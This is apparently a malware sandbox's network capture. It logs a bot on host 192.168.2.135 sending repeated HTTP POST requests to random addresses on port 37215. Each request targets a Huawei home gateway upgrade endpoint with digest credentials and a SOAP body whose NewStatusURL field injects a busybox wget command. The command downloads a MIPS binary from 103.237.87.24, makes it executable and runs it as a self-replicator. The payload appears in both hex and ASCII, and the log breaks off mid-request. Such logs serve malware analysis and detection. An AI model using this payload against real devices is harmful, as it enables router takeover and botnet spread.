69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  439192.168.2.1359392157.38.226.237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.113446951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  440192.168.2.135886460.196.105.5637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.113460064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  441192.168.2.1345836197.18.126.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.113477945 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  442192.168.2.135110641.126.2.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.113478899 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  443192.168.2.1352428157.139.130.2937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.113501072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  444192.168.2.1355534197.170.188.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.113667965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  445192.168.2.1349134197.57.224.23737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.113681078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  446192.168.2.133463641.72.196.12537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.113688946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  447192.168.2.135006463.226.12.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.113696098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  448192.168.2.1356212197.161.246.17637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.113712072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  449192.168.2.1338362157.117.37.18137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.114114046 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
